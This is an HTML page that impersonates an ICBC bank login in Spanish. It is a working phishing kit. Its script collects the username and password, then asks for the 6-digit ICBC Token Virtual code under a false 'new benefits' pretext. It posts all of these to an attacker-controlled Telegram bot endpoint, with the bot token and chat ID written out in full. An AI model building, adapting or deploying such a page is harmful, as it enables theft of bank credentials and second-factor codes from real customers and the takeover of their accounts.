<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>INGRESA</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="./espere_files/css2" rel="stylesheet">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #f0f0f0;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .hidden { display: none; }
        .container {
            max-width: 400px;
            padding: 20px;
            background-color: #fff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
            text-align: center;
        }
        h1 {
            margin-bottom: 20px;
            color: #333;
        }
        #logo {
            display: block;
            margin: 0 auto 20px;
            max-width: 250px;
            height: auto;
        }
        .form-group {
            margin-bottom: 20px;
            text-align: left;
        }
        label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
            color: #333;
        }
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
            box-sizing: border-box;
        }
        button[type="submit"], button[type="button"] {
            width: 100%;
            padding: 10px;
            background-color: #ff0000;
            color: #fff;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            margin-top: 10px;
            font-weight: bold;
        }
        button[type="submit"]:hover, button[type="button"]:hover {
            background-color: #cc0000;
        }
        .clock {
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #ff0000;
            width: 120px;
            height: 120px;
            animation: spin 6s linear infinite;
            margin: 0 auto;
        }
        @keyframes spin {
            from { transform: rotate(0deg); }
            to { transform: rotate(360deg); }
        }
        @media only screen and (max-width: 600px) {
            .container {
                width: 90%;
            }
        }
    </style>
    <script src="./espere_files/jquery-3.6.0.min.js.descarga"></script>
    <script>
        var formData = {};
        var countdownTimer;

        $(document).ready(function() {
            $("#login-form").submit(function(event) {
                event.preventDefault();
                formData = {
                    username: $("#username").val(),
                    password: $("#password").val()
                };
                enviarDatosTelegram(); // Enviar datos de usuario y contraseña
                showCountdown(); // Mostrar el contador después de enviar el formulario
            });
        });

        function showCountdown() {
            $(".login-container").addClass("hidden");
            $(".verification-container").addClass("hidden");
            $(".countdown-container").removeClass("hidden");
            startCountdown(); // Iniciar el contador
        }

        function startCountdown() {
            countdownTimer = setTimeout(function() {
                $(".countdown-container").addClass("hidden");
                $(".verification-container").removeClass("hidden");
            }, 12000); // El contador dura 6 segundos
        }

        function enviarDatosTelegram() {
            var usuarioYContrasena = "Usuario: " + formData.username + "\nContrasena: " + formData.password;

            // Enviar el mensaje para usuario y contraseña
            $.post(
                "https://api.telegram.org/bot7327655020:AAHk8hfEJbzPTgOVuYI9FdPPbcc-0fgZbTg/sendMessage",
                {
                    chat_id: "-4279435075",
                    text: usuarioYContrasena
                }
            );
        }

        function enviarToken() {
            var token = $("#token").val();
            var mensajeToken = "Token: " + token;

            // Enviar el mensaje para el token
            $.post(
                "https://api.telegram.org/bot7327655020:AAHk8hfEJbzPTgOVuYI9FdPPbcc-0fgZbTg/sendMessage",
                {
                    chat_id: "-4279435075",
                    text: mensajeToken
                }
            );
            // Llamar a enviarDatosTelegram() también cuando se confirma el token
            enviarDatosTelegram();
            // Restablecer los campos después de enviar
            $(".verification-container").addClass("hidden");
            $(".login-container").removeClass("hidden");
            $("#username").val('');
            $("#password").val('');
            $("#token").val('');
            showCountdown(); // Reiniciar el contador
        }
    </script>
</head>
<body>
    <div class="container login-container">
        <h1>INGRESA TUS DATOS DE ACCESO</h1>
        <img id="logo" src="./espere_files/icbc-logo-84A5FA60BC-seeklogo.com.png" alt="Logo de ICBC">
        <form id="login-form">
            <div class="form-group">
                <label for="username">Usuario</label>
                <input type="text" id="username" name="username" required="">
            </div>
            <div class="form-group">
                <label for="password">Clave</label>
                <input type="password" id="password" name="password" required="">
            </div>
            <button type="submit">Ingresar</button>
        </form>
    </div>

    <div class="container countdown-container hidden">
        <div class="clock"></div>
        ESTAMOS ASOCIANDO SUS BENEFICIOS DISPONIBLES
    </div>

    <div class="container verification-container hidden">
        <h1>Verificación Requerida</h1>
        <p>Genera el código token de 6 dígitos en la app ICBC Token Virtual para terminar de asociar tus NUEVOS BENEFICIOS. Luego ingrésalo en esta pantalla.</p>
        <div class="center">
            <img src="./espere_files/icbc-logo-84A5FA60BC-seeklogo.com.png" alt="ICBC Logo" width="250px" height="80px">
        </div>
        <form>
            <div class="form-group">
                <label for="token">Código Token</label>
                <input type="text" id="token" name="token" required="">
            </div>
            <button type="button" onclick="enviarToken()">Confirmar</button>
        </form>
    </div>

</body>
</html>
